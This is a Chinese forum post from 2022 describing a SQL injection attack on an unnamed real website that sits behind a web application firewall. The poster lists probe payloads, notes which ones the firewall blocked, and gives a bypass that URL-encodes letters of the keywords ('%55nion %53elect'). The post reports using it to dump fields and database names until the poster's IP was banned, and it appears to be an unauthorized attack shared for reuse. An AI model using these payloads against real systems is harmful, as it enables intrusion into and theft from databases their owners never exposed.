设为首页
收藏本站
切换到宽版
登录
立即注册
找回密码
搜索
搜索
本版
帖子
用户
快捷导航
论坛
BBS
VIP用户组
官网群
无名商城论坛
»
论坛
›
资源分享区
›
学习资源专区
›
某网站的sql注入绕过的小手法
返回列表
发帖
查看:
253
|
回复:
0
[其他技术]
某网站的sql注入绕过的小手法
[复制链接]
无名
无名
当前离线
积分
32464
1万
主题
1万
帖子
3万
积分
管理员
积分
32464
发消息
发表于 2022-5-8 17:57:27
|
显示全部楼层
|
阅读模式
mucn又来分享了 这网站早就记在我的小本子里了[滑稽]
刚刚测试了一下 发现存在注入。 但存在拦截。
然后我在这儿给大家分享一个小绕过方法。
因为刚刚电脑因为多次访问ip被拦截了(如图一) 然后手机搞非常不方便 所以我这里就只分享下怎么绕过哦。
说下前面的几步小操作
and 1=1 (页面正常不拦截)
and 1=2 (页面不正常不拦截)
order by 2 (字段为2 不拦截)
and 1=2 union select 1,2 (拦截)
and 1=2 union (拦截)-这里就判断出waf对union是存在过滤的
and 1=2 select (拦截)-同上 waf对select也存在拦截
然后思考绕过 首先改大小写
and 1=2 UnioN sEleCT (拦截)
接着思考其他绕过手法(对字母U和S进行编码)
and 1=2 %55nion %53elect 1,2 (不拦截 页面爆出字段)如图二
接着通过爆出字段进行一些信息查询 如图三
然后爆库 如图4(就两个库 一个内置库 一个当前使用库)这里要是爆表的话肯定是选择当前使用库进行查表(可惜还没爆表就ip就被拦了 后续等我ip不被拦的时候再考虑要不要继续更下去吧[滑稽][心碎] )
拦截
,
绕过
,
如图
,
字段
,
然后
相关帖子
•
jdk12.0.2与eclipse安装汉化教程
•
【FUT】 怎么解锁元气骑士付费人物教程
•
【IAPP教程】Max,如何将图片导入iapp,纯小白教程,内含
•
【Max考核】SQL注入基础语句步骤
•
【D.M.T】MT管理器教程④~正确安装使用MT
回复
使用道具
举报
返回列表
发帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表